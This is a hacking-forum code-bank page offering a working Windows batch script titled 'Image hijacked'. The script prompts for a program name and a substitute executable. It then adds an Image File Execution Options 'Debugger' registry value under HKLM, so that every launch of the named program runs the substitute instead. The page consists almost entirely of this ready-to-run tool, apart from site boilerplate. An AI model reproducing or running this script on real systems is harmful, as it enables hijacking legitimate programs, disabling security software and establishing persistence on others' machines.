Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Image hijacked - Batch Code Bank


Image hijacked
Image hijacked
                @echo off
@mode con cols=80 lines=20

:start
cls
title Image hijacked -- coed by little evil & color C
echo.
echo                 ***********************************************
echo.
echo                    Image File Execution Options(IFEO) Hijack
echo.
echo            *********************************************************
echo.
echo.
set /p choose1= Enter the program's name you want to Hijack :
@if "%choose1%" == "" goto Error
echo.
set /p choose2= Enter the path of the Hijack program :
@if "%choose2%" == "" goto Error
@if not exist %choose2% cls&echo                Error! File is not exist! Any key goto the main menu!&pause>nul&goto start
@reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%choose1%" /v Debugger /d "%choose2%" /f>nul
echo.
echo  Success! -- %choose1% was hijacked by %choose2%
echo.
set /p AE= Again or Exit ? (A/E) :
@if /i "%AE%" == "A" goto start
echo.
echo                           Any key to exit !
pause>nul
exit

:Error
cls
echo.
echo           Name or path error! Any key to return to the main menu!
pause>nul
goto start
            
Comments
Sorry but there are no comments to display